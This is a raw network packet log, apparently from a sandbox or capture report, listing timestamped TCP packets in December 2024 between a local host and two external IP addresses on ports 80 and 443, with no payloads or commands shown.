Dec 17, 2024 06:03:19.133153915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.133193016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.134445906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.134495020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.134555101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.134592056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.135780096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.135828972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.135919094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.135961056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.137147903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.137195110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.137252092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.137290001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.138442039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.138489008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.138549089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.138586044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.139765024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.139820099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.139880896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.139919043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.141088963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.141133070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.141155958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.141187906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.142369986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.142411947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.142478943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.142523050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.143651962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.143706083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.143738985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.143779993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.144932985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.144975901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.145046949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.145086050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.146203995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.146248102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.146285057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.146328926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.147535086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.147583008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.147669077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.147710085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.148818970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.148864985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.148924112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.148962975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.150110960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.150152922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.150182962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.150222063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.151427031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.151477098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.151537895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.151576996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.152745008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.152792931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.152808905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.152854919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.153999090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.154042006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.154078960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.154118061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.155356884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.155402899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.155431032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.155467033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.156160116 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:19.156254053 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:19.156337023 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:19.156569004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.156615973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.156686068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.156724930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.156805992 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:19.156841040 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:19.157845974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.157892942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.157963037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.158004045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.159117937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.159159899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.159230947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.159271002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.160424948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.160464048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.160523891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.160562038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.161747932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.161789894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.161911011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.161947012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.163042068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.163077116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.163104057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.163140059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.164288998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.164325953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.164410114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.164452076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.165610075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.165648937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.165699959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.165738106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.166835070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.166872978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.166879892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.166918039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.168159962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.168220997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.168276072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.168313980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.169447899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.169490099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.169567108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.169608116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.170758963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.170808077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.170866013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.170933008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.172039986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.172080994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.172143936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.172180891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.173348904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.173388958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.173415899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.173451900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.174607038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.174645901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.174704075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.174745083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.175885916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.175926924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.176001072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.176037073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.177185059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.177225113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.177295923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.177328110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.178488016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.178528070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.178592920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.178632021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.179759026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.179801941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.179868937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.179904938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.181046009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.181085110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.181163073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.181196928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.182346106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.182385921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.182456970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.182496071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.183617115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.183656931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.183736086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.183773041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.184923887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.184973955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.185005903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.185039997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.186193943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.186238050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.186306000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.186343908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.187482119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.187521935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.187577009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.187613010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.188762903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.188802004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.188864946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.188901901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.190017939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.190057039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.313091040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.313149929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.313251019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.313287973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.313711882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.313750982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.313843966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.313880920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.313952923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.313987970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.314939022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.314979076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.315046072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.315080881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.316066980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.316106081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.316171885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.316207886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.317154884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.317198038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.317256927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.317308903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.318275928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.318316936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.318382025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.318417072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.319396973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.319434881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.319503069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.319541931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.320488930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.320528984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.320585966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.320621967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.321610928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.321650982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.321712971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.321748972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.322729111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.322767973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.322829962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.322866917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.323884010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.323923111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.323945045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.323976994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.324956894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.324995995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.325098038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.325138092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.326051950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.326097965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.326138020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.326174974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.327182055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.327224016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.327254057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.327291012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.328308105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.328346968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.328418970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.328455925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.329413891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.329466105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.329498053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.329531908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.330522060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.330559015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.330632925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.330668926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.331634998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.331676006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.331739902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.331775904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.332724094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.332767010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.332828999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.332870960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.333913088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.333949089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.334007025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.334043980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.334974051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.335010052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.335071087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.335108042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.336097002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.336138010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.336205959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.336241961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.337207079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.337245941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.337369919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.337409019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.338308096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.338346958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.338407040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.338442087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.339411974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.339452982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.339524031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.339559078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.340548992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.340591908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.340650082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.340687037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.341679096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.341722965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.341763973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.341823101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.342765093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.342802048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.342907906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.342943907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.343895912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.343939066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.344003916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.344043016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.345015049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.345058918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.345088005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.345125914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.346146107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.346189976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.346259117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.346299887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.347248077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.347296000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.347383022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.347424030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.348347902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.348391056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.348454952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.348503113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.349453926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.349490881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.349495888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.349530935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.350578070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.350625038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.350627899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.350675106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.351669073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.351713896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.351780891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.351819992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.352792978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.352838993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.352910042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.352946997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.353945017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.353987932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.354068995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.354116917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.355108976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.355148077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.355288029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.355324984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.356163025 CET	80	49850	31.41.244.11	192.168.2.5
